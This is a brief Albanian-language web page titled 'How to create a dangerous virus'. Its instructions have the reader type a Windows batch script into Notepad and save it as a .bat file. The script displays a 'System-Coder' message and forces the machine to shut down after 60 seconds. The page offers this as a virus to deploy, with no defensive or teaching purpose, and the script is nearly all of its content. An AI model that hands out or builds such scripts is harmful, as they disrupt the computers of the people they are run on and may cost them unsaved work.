Si ta krijojme nje virus te rrezikshem
1.Hapim Notepad 2.E Shkruajm Kete: @echo msg * System-Coder shutdown -s -t 60 -c "System-Coder KHG" 3.Dhe E Ruajm SiTeDoni.bat
 
Advertisement
 
 
Today, there have been 3 visitors (102 hits) on this page!
=> Do you also want a homepage for free? Then click here! <=